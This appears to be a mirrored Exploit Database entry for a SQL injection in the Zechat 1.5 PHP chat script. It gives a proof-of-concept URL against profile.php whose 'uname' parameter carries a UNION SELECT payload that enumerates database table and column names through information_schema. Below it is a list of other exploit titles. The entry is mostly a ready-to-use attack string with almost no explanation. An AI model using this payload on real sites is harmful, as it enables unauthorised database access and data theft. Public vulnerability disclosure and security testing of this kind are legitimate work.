Zechat 1.5 – ‘uname’ SQL Injection

Exploit Database
12 阅读

作者： Ihsan Sencan

日期： 2018-10-03
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/45523/

# Exploit Title: Zechat 1.5 - 'uname' SQL Injection
# Exploit Author: Ihsan Sencan
# Date: 2018-10-02
# Dork: N/A
# Vendor Homepage: https://bylancer.com/
# Software Link: https://bylancer.com/products/zechat-php-script/index.php
# Version: 1.5
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A

# POC: 
# 1)

https://Target/products/zechat-php-script/profile.php?uname=demo

'+UNION(SELECT+0x283129,0x283229,0x283329,0x283429,0x283529,0x283629,0x283729,0x283829,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229)--+-

last Exploits
Zechat 1.5 – ‘uname’ SQL Injection的更多信息

SiteEngine 7.1 – SQL Injection：
TeamPass 2.1.5 – ‘login’ HTML Injection：
Articlems 2.0 – ‘c[]’ Cross-Site Scripting：
ZenPhoto 1.3 – ‘/zp-core/full-image.php?a’ SQL Injection：
SofaWiki 3.9.2 – Remote Command Execution (RCE) (Authenticated)：
netjukebox 4.01B/5.25 – ‘skin’ Cross-Site Scripting：
E-PHP B2B Marketplace – Multiple Vulnerabilities：
Kodak InSite 5.5.2 – ‘/Pages/login.aspx?Language’ Cross-Site Scripting：